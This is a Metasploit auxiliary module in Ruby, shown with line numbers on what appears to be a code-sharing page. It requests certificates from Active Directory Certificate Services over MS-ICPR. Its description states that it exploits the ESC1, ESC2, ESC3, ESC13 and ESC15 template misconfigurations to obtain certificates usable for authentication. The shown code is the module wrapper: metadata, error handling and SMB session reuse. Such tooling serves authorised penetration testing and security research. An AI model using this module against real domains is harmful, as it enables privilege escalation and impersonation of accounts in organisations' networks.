Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'ruby_smb/dcerpc/client'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Exploit::Remote::MsIcpr
10
  include Msf::Exploit::Remote::SMB::Client::Authenticated
11
  include Msf::Exploit::Remote::DCERPC
12
  include Msf::Auxiliary::Report
13
  include Msf::OptionalSession::SMB
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'ICPR Certificate Management',
20
        'Description' => %q{
21
          Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
22
          template's configuration the resulting certificate can be used for various operations such as authentication.
23
          PFX certificate files that are saved are encrypted with a blank password.
24

25
          This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.
26
        },
27
        'License' => MSF_LICENSE,
28
        'Author' => [
29
          'Will Schroeder', # original idea/research
30
          'Lee Christensen', # original idea/research
31
          'Oliver Lyak', # certipy implementation
32
          'Spencer McIntyre'
33
        ],
34
        'References' => [
35
          [ 'URL', 'https://github.com/GhostPack/Certify' ],
36
          [ 'URL', 'https://github.com/ly4k/Certipy' ]
37
        ],
38
        'Notes' => {
39
          'Reliability' => [],
40
          'Stability' => [],
41
          'SideEffects' => [ IOC_IN_LOGS ],
42
          'AKA' => [ 'Certifry', 'Certipy' ]
43
        },
44
        'Actions' => [
45
          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]
46
        ],
47
        'DefaultAction' => 'REQUEST_CERT'
48
      )
49
    )
50
  end
51

52
  def run
53
    send("action_#{action.name.downcase}")
54
  rescue MsIcprConnectionError => e
55
    fail_with(Failure::Unreachable, e.message)
56
  rescue MsIcprAuthenticationError => e
57
    fail_with(Failure::NoAccess, e.message)
58
  rescue MsIcprNotFoundError => e
59
    fail_with(Failure::NotFound, e.message)
60
  rescue MsIcprUnexpectedReplyError => e
61
    fail_with(Failure::UnexpectedReply, e.message)
62
  rescue MsIcprUnknownError => e
63
    fail_with(Failure::Unknown, e.message)
64
  end
65

66
  def action_request_cert
67
    with_ipc_tree do |opts|
68
      request_certificate(opts)
69
    end
70
  end
71

72
  # @yieldparam options [Hash] If a SMB session is present, a hash with the IPC tree present. Empty hash otherwise.
73
  # @return [void]
74
  def with_ipc_tree
75
    opts = {}
76
    if session
77
      print_status("Using existing session #{session.sid}")
78
      client = session.client
79
      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
80
      opts[:tree] = simple.client.tree_connect("\\\\#{client.dispatcher.tcp_socket.peerhost}\\IPC$")
81
    end
82

83
    yield opts
84
  ensure
85
    opts[:tree].disconnect! if opts[:tree]
86
  end
87
end
88

89